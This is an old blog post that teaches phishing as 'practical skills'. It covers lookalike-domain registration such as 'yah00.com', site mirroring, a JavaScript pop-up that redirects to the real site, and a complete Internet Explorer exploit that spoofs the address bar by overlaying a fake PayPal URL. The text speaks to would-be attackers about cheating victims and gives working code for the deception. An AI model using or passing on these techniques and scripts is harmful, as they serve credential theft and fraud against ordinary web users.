Phishing skills

(http://antbsd.twbbs.org/~ant/wordpress/?p=239, June 21st, 2006)

I have read a article about tricks of phishing on hitcon.org. It said there are five common tricks of phishing.

1. Similar looking URL to Genuine URL


2. Using IP address


3. Pop Up windows


4. URL spoofing of address bar


5. Install Trojans or Spyware

Here I will introduce practical skills about these methods. If I am going wrong, tell me please.

#1 & #2


Just mirror the web site you want to phishing and modify some HTML, javascript codes to fit your goal. Mirror tools, such wget or just 'save pages' in IE, is easy to find and use.

And, then, you should have one DNS to cheat victim. If you will create a fake Yahoo!, its DNS is www.yahoo.com, you could register a DNS like www.yah00.com (00 is zero-zero numbers). If your DNS is unlike Yahoo!, you could fake as www.yahoo.evil.com which DNS is managed by evil.com not yahoo.com.

#3

This is easy than #1. The trick is just using Redireion and Pop-Up methods. The fake page will pop-up a windows to cheat victim. Pop-up window is similar the web site you want to phishing. In order to emhance victim to believe the fake page is real, Redirection method will, then, redirection the fake page to real one. Code is below:

<script language="javascript">
<!--
location.href="http://tw.yahoo.com/" mce_href="http://tw.yahoo.com/" ;
window.open('a.html', 'Welcome', 'height=200, width=400, toolbar=0, scrollbars=0, location=0, statusbar=0, menubar=0, resizable=0');
-->
</script>

#4

URL spoofing is the interesting trick for me. It hide the IE address bar by DIV. It's a pity that the trick works one for IE. The code just written by HTML and Javascript, the most important you must modify is the position of DIV layer. My Code is below: (javascript code must wrapped by )

<body>
<script language="javascript">

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+72;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-200;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= ' <div style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://www.paypal.com/cgi-bin/webscr </div>'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {
}
</script>
</body>

Code available on securityfocus and CastleCops.
#5

This trick exploits the vulnerabilities of IE. If your IE doesn't patch yet and you surfing a malicous page, it will donwload/install malicious program/code on your computer unconsciously.